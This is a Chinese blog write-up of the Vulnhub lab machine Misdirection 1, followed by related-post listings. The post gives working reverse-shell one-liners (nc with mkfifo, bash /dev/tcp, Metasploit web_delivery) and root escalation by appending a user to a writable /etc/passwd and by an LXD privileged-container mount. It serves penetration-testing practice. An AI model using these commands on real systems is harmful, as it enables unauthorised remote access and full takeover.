Vulnhub靶机:MISDIRECTION_ 1

最新推荐文章于 2023-12-29 11:50:22 发布
最新推荐文章于 2023-12-29 11:50:22 发布
阅读量1k 收藏
点赞数 2
分类专栏: 靶机 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/128579446
版权

目录

介绍

系列:Misdirection(此系列共1台)
发布日期:2019 年 9 月 24 日
难度:初级
运行环境:官方推荐Virtualbox,我使用的是VMware
补充:靶机容易被干崩,下手轻点
目标:取得 root 权限
学习:

  • 主机发现
  • 端口扫描+漏洞扫描
  • 反弹shel
  • passwd提权
  • docker提权

靶机地址:https://www.vulnhub.com/entry/misdirection-1,371/

信息收集

主机发现

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

nmap发现了一些有趣的目录,疑似发现了sql注入,经核实为误报

nmap -p- 192.168.229.137
nmap -p22,80,3306,8080 -A 192.168.229.137
nmap -p22,80,3306,8080 --script=vuln 192.168.229.137

在这里插入图片描述

网站探测

80端口常规探测没有发现什么有趣的信息,但是nmap发现了8080端口的一个有趣目录:debug
访问之后如下图,很明显是个命令执行漏洞
在这里插入图片描述

反弹shell

介绍3种方法

方式1:使用nc

由于靶机的nc没有-e参数,可以通过这种方式getshell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.229.128 1234 >/tmp/f

在这里插入图片描述

方式2:使用bash

bash -c 'bash -i >& /dev/tcp/192.168.229.128/9999 0>&1'

在这里插入图片描述

方式3:使用MSF

通过“Wappalyzer”得知,页面是php的,因此payload类型设置为php

use exploit/multi/script/web_delivery
show options
show targets
set target 1
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.229.128
exploit
sessions -i 1
shell
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

复制生成的命令,粘贴到靶机上面,一旦运行,我们就会拿到一个shell,由于靶机是有python的,可以通过python获取一个交互式的shell
在这里插入图片描述

在这里插入图片描述

提权

sudo提权

通过sudo提权,切换身份为brexit
在这里插入图片描述

passwd提权

丢个提权检查脚本,发现/etc/passwd具有可写权限,可以提权;似乎还可以docker提权
在这里插入图片描述

在这里插入图片描述

普普通通的passwd文件配置不当提权

openssl passwd -1 -salt hack hack123
echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash' >> /etc/passwd
tail /etc/passwd
su hack
hack123
id

在这里插入图片描述

docker提权

提权脚本检查到,似乎可以做docker提权,那就试试吧。

  1. 下载镜像

Linux 容器映像构建可在此处找到:https://us.lxd.images.canonical.com/images。我决定使用 Alpine Linux 映像,找到一个合适的镜像,使用kali全部下载下来

wget --no-parent -r https://us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20230104_13:00/
cd /us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20230104_13:00
find . -name '*html*' -delete
tar -cvf alpine.tar ./*

在这里插入图片描述

  1. 投递镜像
kali开启web服务
python -m http.server 80

靶机下载解压
wget http://192.168.229.128/alpine.tar
mkdir alpine
tar -xvf alpine.tar -C alpine
cd alpine

在这里插入图片描述

  1. 手动导入容器映像
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxd init
lxc init alpine alpinect -c security.privileged=true
lxc config device add alpinect pwndisk disk source=/ path=/mnt/root recursive=true
lxc start alpinect
lxc exec alpinect /bin/sh

在这里插入图片描述

在这里插入图片描述

参考

https://benheater.com/vulnhub-misdirection-1/

lainwith
关注
专栏目录
Misdirection 1--VulnHub系列学习记录
weixin_45509443的博客
07-25 328
了解openssl工具 通过 /etc/passwd 提权 了解Metasploit的 Web Delivery Scrip 反弹shell 了解收集非常见反弹shell命令方式
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4298
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub-靶机-Misdirection 1
qq_43264813的博客
01-27 702
Vulnhub靶机Misdirection 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/symfonos-52,415/ 文章目录Vulnhub靶机Misdirection 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全
vulnhub靶机Misdirection
0of_blog
05-01 795
x 是密码占位符,表示密码已加密并存储在 /etc/shadow 文件中;UID 是新用户的 UID,可以选择一个未被占用的数字(建议从 1000 开始);/home/username 是用户的家目录;/bin/bash 是用户的默认 shell。www-data用户允许在localhost上以brexit用户身份执行/bin/bash命令,因此我们可以利用这个漏洞来提权为brexit用户。注意到viminfo中有对/etc/passwd的操作,查看权限。是个仿真终端,查看了一下基本信息,只有低权限身份。
Vulnhub:Misdirection 1靶机
qq_43884092的博客
04-17 192
8080端口/debug目录,是一个可以执行命令的shell,bash和写入用户提权
红队打靶:Misdirection打靶思路详解(vulnhub
Bossfrank的博客
10-23 869
本文是vulnhub靶机Misdirection的详细打靶过程。靶机不难,关键点在于找到合适的突破口,不要在看似繁多的攻击面中徘徊。本文涉及到的知识点包括:信息收集的技巧、常见反弹shell语句、sudo bash提权、viminfo敏感信息、/etc/passwd可写提权等。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机:BOREDHACKERBLOG: SOCIAL NETWORK
tang502的博客
09-24 1248
如果/proc/1/cgroup文件里面可以看到docker,以及docker的hash值。从页面exec()调用命令看出他是python,所以只要建立监听,用python反弹shell。反弹shell工具:https://forum.ywhack.com/shell.php。如果根目录下存在dockerenv,那么有极大的概率,我们是在docker环境中。查看ip,如果ip与网站ip不同,那么有极大的概率,我们是在docker环境中。发现为64的系统,可连接工具Venom,进行docks配置。
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2550
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 2000
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
红队打靶练习:MISDIRECTION: 1
最新发布
分享
12-29 708
红队打靶练习:MISDIRECTION: 1 ; 犹如野鹅追逐般的紧张感......
“突破重围:探索OSCP渗透测试场景中的难题与解决方案“
A485860941的博客
07-17 1174
在OSCP渗透测试认证中,靶场的红队是极具挑战性和实战性的对手,他们不仅拥有深厚的安全知识和技能,还能模拟真实世界中的攻击场景。本文将探索OSCP靶场中超级厉害的红队,介绍他们的攻击策略和技术手段,并分享一些应对策略和解决方案,帮助渗透测试人员更好地应对实际攻击。
入坑 Hack The Box
热门推荐
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
pikachu靶机学习记录
LainWith的博客
08-11 8483
前言:网上关于pikachu的教程很多,这篇博文最大的意义就是对思路的梳理,这也是“靶机”专栏的一贯特点暴力破解基于表单的暴力破解验证码绕过(on client)验证码绕过(on server)token防爆破? 暴力破解 基于表单的暴力破解 首先随意输入一个用户名和密码,Burpsuite抓包 发现没有验证码及其他限制,可以肆意爆破,由于左上角的提示按钮给出了答案,下面处于演示需求做一个简单爆破。 爆出一个账密:admin:123456 验证码绕过(on client) 首先明确两个概念:验证码一
vulnhub之DC9靶机
LainWith的博客
02-15 3459
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
Vulnhub靶机:HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3232
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 3169
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
Vulnhub靶机:HACLABS_ NO_NAME
LainWith的博客
02-06 3155
目录介绍信息收集主机发现主机信息探测网站探测目录扫描命令执行反弹shellFlag2Flag1搜寻隐藏文件提权-Flag3参考 介绍 系列: haclabs(此系列共3台) 发布日期:2020年2月15日 难度:初级-中级 Flag : 3个,每个Flag都存在与特定用户的家目录 学习: 目录扫描 命令执行 find提权 靶机地址:https://www.vulnhub.com/entry/haclabs-no_name,429/ 信息收集 主机发现 netdiscover主机发现 对于VulnHub
vulnhub之DC8靶机
LainWith的博客
02-15 2992
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值